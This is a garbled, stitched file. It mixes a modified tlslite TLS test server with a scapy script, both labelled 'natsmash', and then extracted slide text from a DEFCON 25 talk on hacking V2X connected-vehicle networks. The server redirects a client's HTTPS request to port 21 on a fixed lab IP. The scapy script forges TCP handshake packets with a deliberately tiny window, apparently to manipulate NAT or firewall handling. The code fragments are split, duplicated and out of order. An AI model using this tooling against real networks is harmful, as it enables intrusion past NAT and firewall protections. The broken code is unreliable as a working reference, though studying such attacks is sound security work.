alpn = []
dhparam = None
for opt, arg in opts:
if opt == "-k":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
# OpenSSL/m2crypto does not support RSASSA-PSS certificates
privateKey = parsePEMKey(s, private=True,
implementations=["python"])
elif opt == "-c":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
x509 = X509()
x509.parse(s)
certChain = X509CertChain([x509])
elif opt == "-u":
username = arg
elif opt == "-p":
password = arg
elif opt == "-t":
if tackpyLoaded:
s = open(arg, "rU").read()
tacks = Tack.createFromPemList(s)
elif opt == "-v":
verifierDB = VerifierDB(arg)
verifierDB.open()
elif opt == "-d":
directory = arg
elif opt == "--reqcert":
reqCert = True
elif opt == "-l":
expLabel = arg
elif opt == "-L":
expLength = int(arg)
elif opt == "-a":
alpn.append(bytearray(arg, 'utf-8'))
elif opt == "--param":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
dhparam = parseDH(s)
else:
assert(False)
# when no names provided, don't return array
if not alpn:
alpn = None
if not argv:
printError("Missing address")
if len(argv)>1:
printError("Too many arguments")
#Split address into hostname/port tuple
address = argv[0]
address = address.split(":")
if len(address) != 2:
raise SyntaxError("Must specify <host>:<port>")
address = ( address[0], int(address[1]) )
# Populate the return list
retList = [address]
if "k" in argString:
retList.append(privateKey)
if "c" in argString:
retList.append(certChain)
if "u" in argString:
retList.append(username)
if "p" in argString:
retList.append(password)
if "t" in argString:
retList.append(tacks)
if "v" in argString:
retList.append(verifierDB)
if "d" in argString:
retList.append(directory)
if "reqcert" in flagsList:
retList.append(reqCert)
if "l" in argString:
retList.append(expLabel)
if "L" in argString:
retList.append(expLength)
if "a" in argString:
retList.append(alpn)
if "param=" in flagsList:
retList.append(dhparam)
return retList
def printGoodConnection(connection, seconds):
print(" Handshake time: %.3f seconds" % seconds)
print(" Version: %s" % connection.getVersionName())
print(" Cipher: %s %s" % (connection.getCipherName(),
connection.getCipherImplementation()))
print(" Ciphersuite: {0}".\
format(CipherSuite.ietfNames[connection.session.cipherSuite]))
if connection.session.srpUsername:
print(" Client SRP username: %s" % connection.session.srpUsername)
if connection.session.clientCertChain:
print(" Client X.509 SHA1 fingerprint: %s" %
connection.session.clientCertChain.getFingerprint())
else:
print(" No client certificate provided by peer")
if connection.session.serverCertChain:
print(" Server X.509 SHA1 fingerprint: %s" %
connection.session.serverCertChain.getFingerprint())
if connection.version >= (3, 3) and connection.serverSigAlg is not None:
scheme = SignatureScheme.toRepr(connection.serverSigAlg)
if scheme is None:
scheme = "{1}+{0}".format(
HashAlgorithm.toStr(connection.serverSigAlg[0]),
SignatureAlgorithm.toStr(connection.serverSigAlg[1]))
print(" Key exchange signature: {0}".format(scheme))
if connection.ecdhCurve is not None:
print(" Group used for key exchange: {0}".format(\
GroupName.toStr(connection.ecdhCurve)))
if connection.dhGroupSize is not None:
print(" DH group size: {0} bits".format(connection.dhGroupSize))
if connection.session.serverName:
print(" SNI: %s" % connection.session.serverName)
if connection.session.tackExt:
if connection.session.tackInHelloExt:
emptyStr = "\n (via TLS Extension)"
else:
emptyStr = "\n (via TACK Certificate)"
print(" TACK: %s" % emptyStr)
print(str(connection.session.tackExt))
if connection.session.appProto:
print(" Application Layer Protocol negotiated: {0}".format(
connection.session.appProto.decode('utf-8')))
print(" Next-Protocol Negotiated: %s" % connection.next_proto)
print(" Encrypt-then-MAC: {0}".format(connection.encryptThenMAC))
print(" Extended Master Secret: {0}".format(
connection.extendedMasterSecret))
def printExporter(connection, expLabel, expLength):
if expLabel is None:
return
expLabel = bytearray(expLabel, "utf-8")
exp = connection.keyingMaterialExporter(expLabel, expLength)
exp = b2a_hex(exp).upper()
print(" Exporter label: {0}".format(expLabel))
print(" Exporter length: {0}".format(expLength))
print(" Keying material: {0}".format(exp))
def clientCmd(argv):
(address, privateKey, certChain, username, password, expLabel,
expLength, alpn) = \
handleArgs(argv, "kcuplLa")
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if (username and not password) or (not username and password):
raise SyntaxError("Must specify USER with PASS")
if certChain and username:
raise SyntaxError("Can use SRP or client cert for auth, not both")
if expLabel is not None and not expLabel:
raise ValueError("Label must be non-empty")
#Connect to server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(address)
connection = TLSConnection(sock)
settings = HandshakeSettings()
settings.useExperimentalTackExtension = True
try:
start = time.perf_counter()
if username and password:
connection.handshakeClientSRP(username, password,
settings=settings, serverName=address[0])
else:
connection.handshakeClientCert(certChain, privateKey,
settings=settings, serverName=address[0], alpn=alpn)
stop = time.perf_counter()
print("Handshake success")
except TLSLocalAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
else:
raise
sys.exit(-1)
except TLSRemoteAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
else:
raise
sys.exit(-1)
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
connection.close()
def serverCmd(argv):
(address, privateKey, certChain, tacks, verifierDB, directory, reqCert,
expLabel, expLength, dhparam) = handleArgs(argv, "kctbvdlL",
["reqcert", "param="])
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if tacks and not certChain:
raise SyntaxError("Must specify CERT with Tacks")
print("I am an HTTPS test server, I will listen on %s:%d" %
(address[0], address[1]))
if directory:
os.chdir(directory)
print("Serving files from %s" % os.getcwd())
if certChain and privateKey:
print("Using certificate and private key...")
if verifierDB:
print("Using verifier DB...")
if tacks:
print("Using Tacks...")
if reqCert:
print("Asking for client certificates...")
#############
sessionCache = SessionCache()
username = None
sni = None
if is_valid_hostname(address[0]):
sni = address[0]
class MySimpleHTTPHandler(SimpleHTTPRequestHandler, object):
"""Buffer the header and body of HTTP message."""
wbufsize = -1
def do_GET(self):
if self.path.startswith('/abc'):
self.wfile.write(b'HTTP/1.0 302 Found\r\n')
self.wfile.write(b'Location: https://172.28.64.142:80/abc\r\n')
#self.wfile.write(b'Host: 172.28.64.142\r\n')
self.wfile.write(b'Content-type: text/html; charset=UTF-8\r\n')
#self.wfile.write(b'Content-Length: 0\r\n\r\n')
self.wfile.write(b'Connection: close\r\n')
return
"""Simple override to send KeyUpdate to client."""
if self.path.startswith('/keyupdate'):
for i in self.connection.send_keyupdate_request(
KeyUpdateMessageType.update_requested):
if i in (0, 1):
continue
else:
raise ValueError("Invalid return from "
"send_keyupdate_request")
if self.path.startswith('/secret') and not request_pha:
try:
for i in self.connection.request_post_handshake_auth():
pass
except ValueError:
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
self.connection.read(0, 0)
if self.connection.session.clientCertChain:
print(" Got client certificate in post-handshake auth: "
"{0}".format(self.connection.session
.clientCertChain.getFingerprint()))
else:
print(" No certificate from client received")
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
return super(MySimpleHTTPHandler, self).do_GET()
class MyHTTPServer(ThreadingMixIn, TLSSocketServerMixIn, HTTPServer):
def __init__(self,a,b):
self.tlstimes = 0
super(HTTPServer,self).__init__(a,b)
def handshake(self, connection):
if self.tlstimes !=0:
#time.sleep(100)
pass
self.tlstimes = self.tlstimes+1
print("About to handshake...")
activationFlags = 0
if tacks:
if len(tacks) == 1:
activationFlags = 1
elif len(tacks) == 2:
activationFlags = 3
try:
start = time.perf_counter()
settings = HandshakeSettings()
settings.useExperimentalTackExtension=True
settings.dhParams = dhparam
connection.handshakeServer(certChain=certChain,
privateKey=privateKey,
verifierDB=verifierDB,
tacks=tacks,
activationFlags=activationFlags,
sessionCache=sessionCache,
settings=settings,
nextProtos=[b"http/1.1"],
alpn=[bytearray(b'http/1.1')],
reqCert=reqCert,
sni=sni)
# As an example (does not work here):
#nextProtos=[b"spdy/3", b"spdy/2", b"http/1.1"])
stop = time.perf_counter()
except TLSRemoteAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
return False
else:
raise
except TLSLocalAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
return False
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
return False
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
return False
else:
raise
connection.ignoreAbruptClose = True
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
return True
def runhttpd(httpd):
httpd.serve_forever(5)
httpd = MyHTTPServer(address, MySimpleHTTPHandler)
_thread.start_new_thread(runhttpd, (httpd,))
while True:
if httpd.tlstimes == 1:
httpd.shutdown()
break
else:
pass
# httpd.serve_forever(20)
if __name__ == '__main__':
if len(sys.argv) < 2:
printUsage("Missing command")
elif sys.argv[1] == "client"[:len(sys.argv[1])]:
clientCmd(sys.argv[2:])
elif sys.argv[1] == "server"[:len(sys.argv[1])]:
serverCmd(sys.argv[2:])
else:
printUsage("Unknown command: %s" % sys.argv[1])
natsmash-tlsTCPserver.py

A fake server for port 21 built with scapy; adjust the IP addresses and the advertised window for your environment.
#!/usr/bin/python
from scapy.all import *
import time
while True:
    # Wait for the SYN of the client
    a = sniff(count=2, filter="tcp[tcpflags] & (tcp-syn)!=0 and host 172.28.64.142 and dst port 21")
    # Initializing some variables for later use.
    ValueOfPort = a[1].sport
    a[1].show()
    SeqNr = a[1].seq
    AckNr = a[1].seq + 1  # We are Syn-Acking, so this must be +1
    # Generating the IP layer:
    ip = IP(src="172.28.64.142", dst="172.28.64.19")
    # Generating TCP layer: src port 21, dest port of client,
    # flags SA means "Syn-Ack", the AckNr is +1, and the MSS shall be a default 1460.
    #### advertise a deliberately small receive window
    TCP_SYNACK = TCP(window=50, sport=21, dport=ValueOfPort, flags="SA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
    # send SYN-ACK to remote host AND receive ACK
    GEThttp = sr1(ip/TCP_SYNACK)
natsmash-redirectserver.py
do_getsleep
#!/usr/bin/python3
# Authors:
# Trevor Perrin
# Marcelo Fernandez - bugfix and NPN support
# Capture next TCP packets with dport 80. (contains http GET request)
#GEThttp = sniff(filter="host 172.28.64.142 and port 21", count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}
# Updating the sequence number as well as the Ack number
#AckNr = AckNr+len(GEThttp[0].load)
#######+50windowwindow
AckNr = GEThttp[0].seq + 50
SeqNr = GEThttp[0].ack
# Print the GET request of the client (contains browser data and similar data).
# (Sanity check: size of data should be greater than 1.)
data1=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
time.sleep(0.5)
send(ip/data1)
print("send ACK")
time.sleep(100)
#fakeack = TCP(window=50,sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=SeqNr, options=[('MSS', 1460)])
#send(ip/fakeack)
#GET302http = sniff(filter="tcp and port 21", count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}"))
# AckNr = GET302http[0].seq + 5
# SeqNr = GET302http[0].ack
# data1=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
# #res = sr1(ip/data1/payload)
# Generate custom http file content.
# Generate TCP layer
# time.sleep(3)
# AckNr = a[0].seq+1+270
# SeqNr = a[0].seq + 1
# retransmit=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
#
# # Construct whole network packet, send it and fetch the returning ack.
# reres=sr1(ip/retransmit)
# print("send retransmit")
# Store new sequence number.
#retcp = sniff(filter="tcp and port 21", count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}"))
retcp = sniff(filter="tcp and dst port 21 and src port "+str(ValueOfPort), count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}"))
print("print retransmit")
if len(retcp[0].load)>1:print(retcp[0].load)
SeqNr = retcp[0].ack
#AckNr= retcp[0].seq + len(retcp[0].load)
AckNr= retcp[0].seq
# Generate RST-ACK packet
#Bye=TCP(sport=80, dport=ValueOfPort, flags="RA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
Bye=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
# for i in range(1,100):
# send(ip/Bye)
# time.sleep(0.5)
# print("send finish")
#
# Martin von Loewis - python 3 port
#
# See the LICENSE file for legal information regarding use of this file.
from __future__ import print_function
import sys
import os
import os.path
import socket
import time
import getopt
import binascii
import _thread
from scapy.all import *
try:
import httplib
from SocketServer import *
from BaseHTTPServer import *
from SimpleHTTPServer import *
except ImportError:
# Python 3.x
from http import client as httplib
from socketserver import *
from http.server import *
from http.server import SimpleHTTPRequestHandler
if __name__ != "__main__":
raise RuntimeError("This must be run as a command, not used as a module!")
from tlslite.api import *
from tlslite.constants import CipherSuite, HashAlgorithm, SignatureAlgorithm, \
GroupName, SignatureScheme
from tlslite import __version__
from tlslite.utils.compat import b2a_hex
from tlslite.utils.dns_utils import is_valid_hostname
try:
from tack.structures.Tack import Tack
except ImportError:
pass
def printUsage(s=None):
if s:
print("ERROR: %s" % s)
print("")
print("Version: %s" % __version__)
print("")
print("RNG: %s" % prngName)
print("")
print("Modules:")
if tackpyLoaded:
print(" tackpy : Loaded")
else:
print(" tackpy : Not Loaded")
if m2cryptoLoaded:
print(" M2Crypto : Loaded")
else:
print(" M2Crypto : Not Loaded")
if pycryptoLoaded:
print(" pycrypto : Loaded")
else:
print(" pycrypto : Not Loaded")
if gmpyLoaded:
print(" GMPY : Loaded")
else:
print(" GMPY : Not Loaded")
print("")
print("""Commands:
server
[-k KEY] [-c CERT] [-t TACK] [-v VERIFIERDB] [-d DIR] [-l LABEL] [-L LENGTH]
[--reqcert] [--param DHFILE] HOST:PORT
client
[-k KEY] [-c CERT] [-u USER] [-p PASS] [-l LABEL] [-L LENGTH] [-a ALPN]
HOST:PORT
LABEL - TLS exporter label
LENGTH - amount of info to export using TLS exporter
ALPN - name of protocol for ALPN negotiation, can be present multiple times
in client to specify multiple protocols supported
DHFILE - file that includes Diffie-Hellman parameters to be used with DHE
key exchange
""")
sys.exit(-1)
def printError(s):
"""Print error message and exit"""
sys.stderr.write("ERROR: %s\n" % s)
sys.exit(-1)
def handleArgs(argv, argString, flagsList=[]):
# Convert to getopt argstring format:
# Add ":" after each arg, ie "abc" -> "a:b:c:"
getOptArgString = ":".join(argString) + ":"
try:
opts, argv = getopt.getopt(argv, getOptArgString, flagsList)
except getopt.GetoptError as e:
printError(e)
# Default values if arg not present
privateKey = None
certChain = None
username = None
password = None
tacks = None
verifierDB = None
reqCert = False
directory = None
expLabel = None
expLength = 20
alpn = []
dhparam = None
for opt, arg in opts:
if opt == "-k":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
# OpenSSL/m2crypto does not support RSASSA-PSS certificates
privateKey = parsePEMKey(s, private=True,
implementations=["python"])
elif opt == "-c":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
x509 = X509()
x509.parse(s)
certChain = X509CertChain([x509])
elif opt == "-u":
username = arg
elif opt == "-p":
password = arg
elif opt == "-t":
if tackpyLoaded:
s = open(arg, "rU").read()
tacks = Tack.createFromPemList(s)
elif opt == "-v":
verifierDB = VerifierDB(arg)
verifierDB.open()
elif opt == "-d":
directory = arg
elif opt == "--reqcert":
reqCert = True
elif opt == "-l":
expLabel = arg
elif opt == "-L":
expLength = int(arg)
elif opt == "-a":
alpn.append(bytearray(arg, 'utf-8'))
elif opt == "--param":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
dhparam = parseDH(s)
else:
assert(False)
# when no names provided, don't return array
if not alpn:
alpn = None
if not argv:
printError("Missing address")
if len(argv)>1:
printError("Too many arguments")
#Split address into hostname/port tuple
address = argv[0]
address = address.split(":")
if len(address) != 2:
raise SyntaxError("Must specify <host>:<port>")
address = ( address[0], int(address[1]) )
# Populate the return list
retList = [address]
if "k" in argString:
retList.append(privateKey)
if "c" in argString:
retList.append(certChain)
if "u" in argString:
retList.append(username)
if "p" in argString:
retList.append(password)
if "t" in argString:
retList.append(tacks)
if "v" in argString:
retList.append(verifierDB)
if "d" in argString:
retList.append(directory)
if "reqcert" in flagsList:
retList.append(reqCert)
if "l" in argString:
retList.append(expLabel)
if "L" in argString:
retList.append(expLength)
if "a" in argString:
retList.append(alpn)
if "param=" in flagsList:
retList.append(dhparam)
return retList
def printGoodConnection(connection, seconds):
print(" Handshake time: %.3f seconds" % seconds)
print(" Version: %s" % connection.getVersionName())
print(" Cipher: %s %s" % (connection.getCipherName(),
connection.getCipherImplementation()))
print(" Ciphersuite: {0}".\
format(CipherSuite.ietfNames[connection.session.cipherSuite]))
if connection.session.srpUsername:
print(" Client SRP username: %s" % connection.session.srpUsername)
if connection.session.clientCertChain:
print(" Client X.509 SHA1 fingerprint: %s" %
connection.session.clientCertChain.getFingerprint())
else:
print(" No client certificate provided by peer")
if connection.session.serverCertChain:
print(" Server X.509 SHA1 fingerprint: %s" %
connection.session.serverCertChain.getFingerprint())
if connection.version >= (3, 3) and connection.serverSigAlg is not None:
scheme = SignatureScheme.toRepr(connection.serverSigAlg)
if scheme is None:
scheme = "{1}+{0}".format(
HashAlgorithm.toStr(connection.serverSigAlg[0]),
SignatureAlgorithm.toStr(connection.serverSigAlg[1]))
print(" Key exchange signature: {0}".format(scheme))
if connection.ecdhCurve is not None:
print(" Group used for key exchange: {0}".format(\
GroupName.toStr(connection.ecdhCurve)))
if connection.dhGroupSize is not None:
print(" DH group size: {0} bits".format(connection.dhGroupSize))
if connection.session.serverName:
print(" SNI: %s" % connection.session.serverName)
if connection.session.tackExt:
if connection.session.tackInHelloExt:
emptyStr = "\n (via TLS Extension)"
else:
emptyStr = "\n (via TACK Certificate)"
print(" TACK: %s" % emptyStr)
print(str(connection.session.tackExt))
if connection.session.appProto:
print(" Application Layer Protocol negotiated: {0}".format(
connection.session.appProto.decode('utf-8')))
print(" Next-Protocol Negotiated: %s" % connection.next_proto)
print(" Encrypt-then-MAC: {0}".format(connection.encryptThenMAC))
print(" Extended Master Secret: {0}".format(
connection.extendedMasterSecret))
def printExporter(connection, expLabel, expLength):
if expLabel is None:
return
expLabel = bytearray(expLabel, "utf-8")
exp = connection.keyingMaterialExporter(expLabel, expLength)
exp = b2a_hex(exp).upper()
print(" Exporter label: {0}".format(expLabel))
print(" Exporter length: {0}".format(expLength))
print(" Keying material: {0}".format(exp))
def clientCmd(argv):
(address, privateKey, certChain, username, password, expLabel,
expLength, alpn) = \
handleArgs(argv, "kcuplLa")
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if (username and not password) or (not username and password):
raise SyntaxError("Must specify USER with PASS")
if certChain and username:
raise SyntaxError("Can use SRP or client cert for auth, not both")
if expLabel is not None and not expLabel:
raise ValueError("Label must be non-empty")
#Connect to server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(address)
connection = TLSConnection(sock)
settings = HandshakeSettings()
settings.useExperimentalTackExtension = True
try:
start = time.perf_counter()
if username and password:
connection.handshakeClientSRP(username, password,
settings=settings, serverName=address[0])
else:
connection.handshakeClientCert(certChain, privateKey,
settings=settings, serverName=address[0], alpn=alpn)
stop = time.perf_counter()
print("Handshake success")
except TLSLocalAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
else:
raise
sys.exit(-1)
except TLSRemoteAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
else:
raise
sys.exit(-1)
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
connection.close()
def serverCmd(argv):
(address, privateKey, certChain, tacks, verifierDB, directory, reqCert,
expLabel, expLength, dhparam) = handleArgs(argv, "kctbvdlL",
["reqcert", "param="])
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if tacks and not certChain:
raise SyntaxError("Must specify CERT with Tacks")
print("I am an HTTPS test server, I will listen on %s:%d" %
(address[0], address[1]))
if directory:
os.chdir(directory)
print("Serving files from %s" % os.getcwd())
if certChain and privateKey:
print("Using certificate and private key...")
if verifierDB:
print("Using verifier DB...")
if tacks:
print("Using Tacks...")
if reqCert:
print("Asking for client certificates...")
#############
sessionCache = SessionCache()
username = None
sni = None
request_pha = False  # post-handshake auth is never requested in this trimmed script
if is_valid_hostname(address[0]):
sni = address[0]
class MySimpleHTTPHandler(SimpleHTTPRequestHandler, object):
"""Buffer the header and body of HTTP message."""
wbufsize = -1
def do_GET(self):
if self.path.startswith('/abc'):
time.sleep(5)
self.wfile.write(b'HTTP/1.1 302 Found\r\n')
self.wfile.write(b'Location:https://172.28.64.142:21\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
# Simple override to send KeyUpdate to client.
if self.path.startswith('/keyupdate'):
for i in self.connection.send_keyupdate_request(
KeyUpdateMessageType.update_requested):
if i in (0, 1):
continue
else:
raise ValueError("Invalid return from "
"send_keyupdate_request")
if self.path.startswith('/secret') and not request_pha:
try:
for i in self.connection.request_post_handshake_auth():
pass
except ValueError:
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
self.connection.read(0, 0)
if self.connection.session.clientCertChain:
print(" Got client certificate in post-handshake auth: "
"{0}".format(self.connection.session
.clientCertChain.getFingerprint()))
else:
print(" No certificate from client received")
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
return super(MySimpleHTTPHandler, self).do_GET()
class MyHTTPServer(ThreadingMixIn, TLSSocketServerMixIn, HTTPServer):
def __init__(self,a,b):
self.tlstimes = 0
super(HTTPServer,self).__init__(a,b)
def handshake(self, connection):
if self.tlstimes !=0:
#time.sleep(100)
pass
self.tlstimes = self.tlstimes+1
print("About to handshake...")
activationFlags = 0
if tacks:
if len(tacks) == 1:
activationFlags = 1
elif len(tacks) == 2:
activationFlags = 3
try:
start = time.perf_counter()
settings = HandshakeSettings()
settings.useExperimentalTackExtension=True
settings.dhParams = dhparam
connection.handshakeServer(certChain=certChain,
privateKey=privateKey,
verifierDB=verifierDB,
tacks=tacks,
activationFlags=activationFlags,
sessionCache=sessionCache,
settings=settings,
nextProtos=[b"http/1.1"],
alpn=[bytearray(b'http/1.1')],
reqCert=reqCert,
sni=sni)
# As an example (does not work here):
#nextProtos=[b"spdy/3", b"spdy/2", b"http/1.1"])
stop = time.perf_counter()
except TLSRemoteAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
return False
else:
raise
except TLSLocalAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
return False
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
return False
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
return False
else:
raise
connection.ignoreAbruptClose = True
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
return True
# def runhttpd(httpd):
# httpd.serve_forever(5)
httpd = MyHTTPServer(address, MySimpleHTTPHandler)
# _thread.start_new_thread(runhttpd, (httpd,))
# while True:
# if httpd.tlstimes == 1:
# #time.sleep(0.5)
# #httpd.shutdown()
# #break
# else:
# pass
httpd.serve_forever(20)
if __name__ == '__main__':
if len(sys.argv) < 2:
printUsage("Missing command")
elif sys.argv[1] == "client"[:len(sys.argv[1])]:
clientCmd(sys.argv[2:])
elif sys.argv[1] == "server"[:len(sys.argv[1])]:
serverCmd(sys.argv[2:])
else:
printUsage("Unknown command: %s" % sys.argv[1])
0x04
demoftptls ticket
payload demo
Linux-Stack Based V2X Framework: SocketV2V
All You Need to Hack Connected Vehicles
Duncan Woodbury, Nicholas Haltmeyer
{[email protected], [email protected]}
DEFCON 25: July 29, 2017
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
1 / 48
State of the World: (Semi)Autonomous Driving
Technologies
Vehicular automation widespread in global industry
Automated driving technologies becoming accessible to general public
Comms protocols used today in vehicular networks heavily flawed
New automated technologies still using CANBUS and derivatives
Stages of Autonomy
Today: Stage 2 Autonomy - Combined Function Automation
V2X: Stage 3 Autonomy - Limited Self-Driving Automation
Barriers to Stage 3+ Autonomy
Ownership of ethical responsibilities - reacting to safety-critical events
Technological infrastructure
Installing roadside units, data centers, etc.
Adaptive and intuitive machine-learning technology
V2X Concept
Vehicles and Infrastructure use
WAVE over 5.8-5.9GHz adhoc
mesh network to exchange state
information
Link WAVE/DSRC radios to
vehicle BUS to enable
automated hazard awareness
and avoidance
Technological bridge to fully
autonomous vehicles
Critical Aspects of V2V
High throughput vehicular ad hoc mesh network (VANET)
Provide safety features beyond capability of onboard sensors
Geared for homogeneous adoption in consumer automotive systems
Easy integration with existing transportation infrastructure
First application of stage 3 automation in consumer marketplace
Impact of V2X Technologies
Transportation network impacts all aspects of society
Impact of V2X Technologies: on Consumers
Safety benefits:
Prevent 25,000 to
592,000 crashes
annually
Avoid 11,000 to
270,000 injuries
Prevent 31,000 to
728,000 property
damaging crashes
Traffic flow optimization:
27% reduction for freight
23% reduction for emergency vehicles
42% reduction on freeway (with cooperative adaptive cruise control &
speed harmonization)
Impact of V2X Technologies: Global Industry
Scalable across industrial
platforms
Optimize swarm functions
Improve exchange of sensor
data
Enhance/improve worker safety
Vehicle-to-pedestrian
Construction, agriculture,
maintenance
Improve logistical operations management
Think: air traffic control for trucks
Impact of V2X Technologies: Critical Infrastructure
Provide interface for infrastructure to leverage VANET as carrier
Increase awareness of traffic patterns in specific regions
Analysis of network traffic facilitates improvements in civil engineering
processes
Fast widespread distribution of emergency alerts
Reduce cost of public transit systems
Impact of V2X Technologies: Automotive Security
Wide open wireless attack vector into transportation network
Injections easily propagate across entire VANET
Wireless reverse engineering using 1609 and J2735
Easy to massively distribute information (malware)
Technologies Using V2X
Collision avoidance (Forward Collision Warning) systems
Advanced Driver Assistance Systems (ADAS)
Cooperative adaptive cruise control
Automated ticketing and tolling
Vision of SocketV2V
Security through
obscurity leads to
inevitable pwning
Security community
must be involved in
development of
public safety systems
Catalyze development of secure functional connected systems
Provide interface to VANET with standard COTS hardware
Background on SocketV2V
Linux V2V development begins November 2015
Large body of existing work found to be incomplete
No open-source implementation exists
Attempts at integration in linux-wireless since 2004
Abandoned efforts to patch previous attempts mid-2016
Two years of kernel debugging later, V2V is real
Motivation for V2X Development
Current standards for onboard vehicle communications not designed
to handle VANET
Increase in automation ⇒ increase in attack surface
Auto industry calling for proprietary solutions
Leads to a monopolization of technology
Standards still incomplete and bound for change, proprietary solutions
become obsolete
Multiple alternative standards being developed independently across
borders
Imminent deployment requires immediate attention
Lessons Learned from Previous Epic Failure
1 You keep calling yourself
a kernel dev, I do not
think it means what you
think it means
2 Sharing is caring: closed-source development leads to failure
3 Standards committees need serious help addressing unprecedented
levels of complexity in new and future systems
V2X Stack Overview
V2X Stack Overview: 802.11p
Wireless Access in Vehicular Environments
Amendment to IEEE 802.11-2012 to support WAVE/DSRC
PHY layer of V2X stack
No association, no authentication, no encryption
Multicast addressing with wildcard BSSID = {ff:ff:ff:ff:ff:ff}
5.8-5.9GHz OFDM with 5/10MHz subcarriers
IEEE 1609
WAVE Short Message Protocol (WSMP)
1609.2 Security Services
PKI, cert revocation, misbehavior reporting
1609.3 Networking Services
Advertisements, message fields
1609.4 Multi-Channel Operation
Channel sync, MLMEX
1609.12 Identifier Allocations
Provider service IDs
IEEE 1609: WAVE Short Message
V2X Stack Overview: SAE J2735
Message dictionary specifying message formats, data elements
Basic safety message, collision avoidance, emergency vehicle alert, etc.
ASN1 UPER specification
Also supports XML encoding
Data element of Wave Short Message
Application-layer component of V2X stack
State of V2X Standards: Evolution
WAVE drafted in 2005, J2735 in 2006
WAVE revisions not backwards compatible
IEEE 1609.2 incomplete
J2735 revisions not backwards compatible
Encoding errors in J2735 ASN1 specification
3 active pilot studies by USDOT
Experimental V2X deployment in EU
Developmental status still in flux
Major Changes to the Standards
Refactoring of security services to change certificate structure
Refactoring of management plane to add services (P2PCD)
Refactoring of application layer message encoding format
Multiple times: BER ⇒ DER ⇒ UPER
Refactoring of application layer ASN1 configuration
Revision of trust management system - still incomplete
(Possibly Unintentional) Obfuscation of the Standards
No specification of handling for service management and RF
optimization
Minimal justification given for design choices
Introduction of additional ambiguity in message parsing (WRA IEX
block)
Redlining of CRC data element in J2735 messages
Refactoring of J2735 ASN1 to a non standard format
Proposed channel sharing scheme with telecom
Subtleties in WAVE/J2735
Ordering of certain fields not guaranteed in 1609
Type incongruities in 1609
Wave Information Element contains nested structures
Channel synchronization mechanism based on proximal VANET traffic
Channel switching necessary with one-antenna systems
Implementation-specific vulnerabilities can affect the entire network
V2X Attack Surfaces
VANET accessible from a single endpoint
